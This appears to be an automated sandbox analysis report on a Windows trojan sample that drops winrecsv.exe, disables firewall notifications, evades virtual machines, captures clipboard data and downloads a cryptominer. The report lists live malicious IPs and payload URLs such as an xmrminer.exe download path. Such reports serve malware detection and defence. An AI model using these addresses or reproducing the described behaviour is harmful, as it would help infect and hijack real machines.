Source: global traffic | HTTP traffic detected: GET /twizt/3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /twizt/4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /twizt/5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /twizt/6 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /xmrminer.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.215.113.84 | Connection: Keep-Alive
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00403DB0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA
Source: Id4zlrsrZ4.exe, 00000000.00000002.348077392.000000000071A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00403480 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: Id4zlrsrZ4.exe, type: SAMPLE
Source: Yara match | File source: 5.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Id4zlrsrZ4.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winrecsv.exe PID: 6244, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winrecsv.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\winrecsv.exe, type: DROPPED
Source: Id4zlrsrZ4.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | File created: C:\Windows\winrecsv.exe
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_004092E0
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040F088
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00402E90
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00406950
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00406979
Source: C:\Windows\winrecsv.exe | Code function: 1_2_004092E0
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040F088
Source: C:\Windows\winrecsv.exe | Code function: 1_2_00402E90
Source: C:\Windows\winrecsv.exe | Code function: 1_2_00406950
Source: C:\Windows\winrecsv.exe | Code function: 1_2_00406979
Source: C:\Windows\winrecsv.exe | Code function: 5_2_004092E0
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040F088
Source: C:\Windows\winrecsv.exe | Code function: 5_2_00402E90
Source: C:\Windows\winrecsv.exe | Code function: 5_2_00406950
Source: C:\Windows\winrecsv.exe | Code function: 5_2_00406979
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040C210 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040F2CD NtQueryVirtualMemory
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040C210 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040F2CD NtQueryVirtualMemory
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040C210 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040F2CD NtQueryVirtualMemory
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\509517324.exe F97C43BF3DCE6180E658F2C3776E31CF52472B28AC8249BE4D307880B6405EEB
Source: Id4zlrsrZ4.exe | Virustotal: Detection: 70%
Source: Id4zlrsrZ4.exe | ReversingLabs: Detection: 74%
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | File read: C:\Users\user\Desktop\Id4zlrsrZ4.exe
Source: Id4zlrsrZ4.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Id4zlrsrZ4.exe "C:\Users\user\Desktop\Id4zlrsrZ4.exe"
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Process created: C:\Windows\winrecsv.exe C:\Windows\winrecsv.exe
Source: unknown | Process created: C:\Windows\winrecsv.exe "C:\Windows\winrecsv.exe"
Source: C:\Windows\winrecsv.exe | Process created: C:\Users\user\AppData\Local\Temp\509517324.exe C:\Users\user~1\AppData\Local\Temp\509517324.exe
Source: C:\Windows\winrecsv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\winrecsv.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\1[1]
Source: C:\Windows\winrecsv.exe | File created: C:\Users\user~1\AppData\Local\Temp\509517324.exe
Source: classification engine | Classification label: mal100.troj.evad.mine.winEXE@8/7@0/7
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_004054D0 CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_004050B0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread
Source: C:\Windows\winrecsv.exe | Mutant created: \Sessions\1\BaseNamedObjects\984658
Source: C:\Windows\winrecsv.exe | File read: C:\Windows\System32\drivers\etc\hosts

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Executable created and started: C:\Windows\winrecsv.exe
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | File created: C:\Windows\winrecsv.exe
Source: C:\Windows\winrecsv.exe | File created: C:\Users\user\AppData\Local\Temp\509517324.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | File opened: C:\Users\user\Desktop\Id4zlrsrZ4.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\winrecsv.exe | File opened: C:\Windows\winrecsv.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\winrecsv.exe | File opened: C:\Users\user~1\AppData\Local\Temp\509517324.exe:Zone.Identifier (read attributes | delete)
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | File opened: C:\Users\user~1\AppData\Local\Temp\1840439288.exe:Zone.Identifier (read attributes | delete)
Source: C:\Windows\winrecsv.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\winrecsv.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_1-4253)
Source: C:\Windows\winrecsv.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_1-4253)
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_0-4253)
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_0-4253)
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040B8F0
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040B8F0
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040B8F0
Source: C:\Windows\winrecsv.exe TID: 6628 | Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\509517324.exe TID: 6820 | Thread sleep time: -263395s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\509517324.exe TID: 6820 | Thread sleep time: -225895s >= -30000s
Source: C:\Windows\winrecsv.exe | Last function: Thread delayed
Source: C:\Windows\winrecsv.exe | Thread delayed: delay time: 900000
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | Thread delayed: delay time: 263395
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | Thread delayed: delay time: 225895
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Evaded block: after key decision (graph_0-4341)
Source: C:\Windows\winrecsv.exe | Evaded block: after key decision (graph_1-4253)
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_0-4267)
Source: C:\Windows\winrecsv.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
Source: C:\Windows\winrecsv.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_1-4267)
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | API coverage: 3.4 %
Source: C:\Windows\winrecsv.exe | API coverage: 1.2 %
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040EEA0 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\winrecsv.exe | Code function: 1_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\winrecsv.exe | Code function: 1_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\winrecsv.exe | Code function: 5_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\winrecsv.exe | Code function: 5_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\winrecsv.exe | Thread delayed: delay time: 900000
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | Thread delayed: delay time: 263395
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | Thread delayed: delay time: 225895
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\winrecsv.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\winrecsv.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\winrecsv.exe | API call chain: ExitProcess graph end node
Source: Amcache.hve.7.dr | Binary or memory string: VMware
Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
Source: 509517324.exe, 00000007.00000002.420283496.000000000122F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWZ
Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr | Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 509517324.exe, 00000007.00000002.420283496.000000000122F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.me
Source: 509517324.exe, 00000007.00000002.420271661.0000000001228000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: 509517324.exe, 00000007.00000002.420271661.0000000001228000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.7.dr | Binary or memory string: VMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89
Source: 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`[#
Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00408C70 GetProcessHeaps | 0_2_00408C70
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: GetLocaleInfoA | 0_2_0040D4A0
Source: C:\Windows\winrecsv.exe | Code function: GetLocaleInfoA | 1_2_0040D4A0
Source: C:\Windows\winrecsv.exe | Code function: GetLocaleInfoA | 5_2_0040D4A0

                          Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\winrecsv.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride
Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe

                          Remote Access Functionality

Source: Yara match | File source: Id4zlrsrZ4.exe, type: SAMPLE
Source: Yara match | File source: 5.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Id4zlrsrZ4.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winrecsv.exe PID: 6244, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winrecsv.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\winrecsv.exe, type: DROPPED
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040DC40 CreateEventA,socket,htons,setsockopt,bind,CreateThread | 0_2_0040DC40
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040EEA0 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect | 0_2_0040EEA0
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040E110 CreateEventA,socket,bind,CreateThread | 0_2_0040E110
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040C930 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket | 0_2_0040C930
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040DC40 CreateEventA,socket,htons,setsockopt,bind,CreateThread | 1_2_0040DC40
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040EEA0 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect | 1_2_0040EEA0
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040E110 CreateEventA,socket,bind,CreateThread | 1_2_0040E110
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040C930 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket | 1_2_0040C930
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040DC40 CreateEventA,socket,htons,setsockopt,bind,CreateThread | 5_2_0040DC40
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040EEA0 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect | 5_2_0040EEA0
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040E110 CreateEventA,socket,bind,CreateThread | 5_2_0040E110
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040C930 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket | 5_2_0040C930
MITRE ATT&CK Matrix (techniques listed per tactic column; the number preceding a technique is the report's signature count for it)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 11 Native API; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: 1 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: 121 Masquerading; 1 Disable or Modify Tools; 21 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Hidden Files and Directories; Steganography
Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 231 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 21 Input Capture; 1 Archive Collected Data; 2 Clipboard Data; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: 2 Encrypted Channel; 1 Non-Standard Port; 4 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data
Behavior Graph (ID: 684211, Sample: Id4zlrsrZ4.exe, Start date: 15/08/2022, Architecture: WINDOWS, Score: 100)

Root signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 4 other signatures
Id4zlrsrZ4.exe (started from root): dropped C:\Windows\winrecsv.exe (PE32); started winrecsv.exe. Signatures: Found evasive API chain (may stop execution after checking mutex); Contains functionality to check if Internet connection is working; Drops executables to the windows directory (C:\Windows) and starts them; Contains functionality to detect sleep reduction / modifications
winrecsv.exe (started from root): contacted 185.215.113.66 (ports 49762, 49763, 49778; WHOLESALECONNECTIONSNL, Portugal), 176.194.22.84 (port 40500; TI-ASMoscowRussiaRU, Russian Federation) and 4 other IPs or domains; dropped C:\Users\user\AppData\Local\...\509517324.exe (PE32); started 509517324.exe. Signatures: Changes security center settings (notifications, updates, antivirus, firewall); Hides that the sample has been downloaded from the Internet (zone.identifier)
winrecsv.exe (started by Id4zlrsrZ4.exe): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 2 other signatures
509517324.exe (started by winrecsv.exe): contacted 185.215.113.84 (ports 49765, 49767, 80; WHOLESALECONNECTIONSNL, Portugal). Signatures: Creates HTML files with .exe extension (expired dropper behavior); Machine Learning detection for dropped file; Hides that the sample has been downloaded from the Internet (zone.identifier)

Source | Detection | Scanner | Label
Id4zlrsrZ4.exe | 70% | Virustotal |
Id4zlrsrZ4.exe | 74% | ReversingLabs | Win32.Trojan.FWDisable
Id4zlrsrZ4.exe | 100% | Avira | HEUR/AGEN.1237550
Id4zlrsrZ4.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Windows\winrecsv.exe | 100% | Avira | HEUR/AGEN.1237550
C:\Users\user\AppData\Local\Temp\509517324.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Windows\winrecsv.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\509517324.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\509517324.exe | 52% | Metadefender |
C:\Users\user\AppData\Local\Temp\509517324.exe | 88% | ReversingLabs | Win32.Trojan.Donut
C:\Windows\winrecsv.exe | 74% | ReversingLabs | Win32.Trojan.FWDisable

Source | Detection | Scanner | Label
0.2.Id4zlrsrZ4.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1237550
7.0.509517324.exe.10d0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.winrecsv.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1237550
5.0.winrecsv.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1237550
1.0.winrecsv.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1237550
1.2.winrecsv.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1237550
0.0.Id4zlrsrZ4.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1237550
7.2.509517324.exe.10d0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                          No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.66/twizt/3Strong | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/984658winrecsv.exeWindows | 100% | Avira URL Cloud | malware
http://185.215.113.84/xmrminer.exe | 15% | Virustotal |
http://185.215.113.84/xmrminer.exe | 100% | Avira URL Cloud | malware
http://185.215.113.84/xmrminer.exeBLk | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/1NNC: | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/3l=8 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/4lH9 | 100% | Avira URL Cloud | malware
http://2462462645.fr/ | 0% | Avira URL Cloud | safe
http://185.215.113.66/twizt/6k8 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/ | 100% | Avira URL Cloud | malware
http://185.215.113.84/xmrminer.exe( | 100% | Avira URL Cloud | malware
http://2462462645.fr/5797957298589274527842dgd828d8g8fg8g8gfeu8gf8g2gf8g2fgaefafugaugfgauegfaefyaieg | 0% | Avira URL Cloud | safe
http://185.215.113.66/twizt/3lZ9 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/15C5FCA7 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/3l | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/6lS9 | 100% | Avira URL Cloud | malware
http://185.215.113.84/xmrminer.exer | 100% | Avira URL Cloud | malware
